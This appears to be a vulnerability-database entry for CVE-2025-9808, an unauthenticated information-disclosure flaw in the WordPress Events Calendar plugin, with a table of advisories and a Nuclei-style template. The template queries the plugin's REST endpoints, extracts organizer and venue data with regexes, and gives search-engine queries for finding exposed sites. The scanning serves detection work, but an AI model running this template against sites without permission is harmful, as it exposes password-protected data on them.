| Title | Published | Reporter |
|---|---|---|
| CVE-2025-9808 | 20 Dec 2025 21:03 | circl |
| WordPress plugin The Events Calendar information disclosure vulnerability | 16 Sep 2025 00:00 | cnnvd |
| CVE-2025-9808 | 16 Sep 2025 05:25 | cve |
| CVE-2025-9808 The Events Calendar <= 6.15.2 - Missing Authorization to Unauthenticated Password-Protected Information Disclosure | 16 Sep 2025 05:25 | cvelist |
| EUVD-2025-29359 | 3 Oct 2025 20:07 | euvd |
| CVE-2025-9808 | 16 Sep 2025 06:16 | nvd |
| WordPress The Events Calendar plugin <= 6.15.2 - Missing Authorization to Unauthenticated Password-Protected Information Disclosure vulnerability | 15 Sep 2025 22:10 | patchstack |
| PT-2025-37866 | 16 Sep 2025 00:00 | ptsecurity |
| CVE-2025-9808 | 18 Sep 2025 05:26 | redhatcve |
| CVE-2025-9808 The Events Calendar <= 6.15.2 - Missing Authorization to Unauthenticated Password-Protected Information Disclosure | 16 Sep 2025 05:25 | vulnrichment |

```yaml
id: CVE-2025-9808

info:
  name: The Events Calendar <= 6.15.2 - Information Disclosure
  author: zer0p0int
  severity: medium
  description: |
    The Events Calendar WordPress plugin <= 6.15.2 contains an information disclosure vulnerability caused by REST endpoint exposure, letting unauthenticated attackers extract data about password-protected vendors or venues, exploit requires no authentication.
  impact: |
    Unauthenticated attackers can access sensitive information about password-protected vendors or venues.
  remediation: |
    Update to the latest version beyond 6.15.2
  reference:
    - https://www.wiz.io/vulnerability-database/cve/cve-2025-9808
    - https://wpscan.com/plugin/the-events-calendar/
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/the-events-calendar
    - https://wordpress.org/plugins/the-events-calendar/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-9808
  metadata:
    verified: true
    max-request: 2
    shodan-query: http.html:"/wp-content/plugins/the-events-calendar/"
    fofa-query: body="/wp-content/plugins/the-events-calendar/"
    publicwww-query: "/wp-content/plugins/the-events-calendar/"
  tags: cve,cve2025,wordpress,wp-plugin,wpscan,the-events-calendar,unauth,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-json/tribe/events/v1/organizers"
      - "{{BaseURL}}/wp-json/tribe/events/v1/venues"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body,"rest_url","total")'
          - 'contains_any(body,"organizers","venues")'
          - 'contains(header,"application/json")'
        condition: and

    extractors:
      - type: regex
        part: body
        name: organizer_data
        group: 1
        regex:
          - '"organizers":\[(.*?)\],"rest_url"'

      - type: regex
        part: body
        name: venue_data
        group: 1
        regex:
          - '"venues":\[(.*?)\],"rest_url"'
# digest: 4a0a0047304502201673a52f687efaa722968308d3f40ee35d3ffb5462cc28f1eff5137360aece08022100feab62f99f297b44e62813b3e160ec5047e4b1c7fa213309c7312e3fb14ed903:922c64590222798bb761d5b6d8e72950
```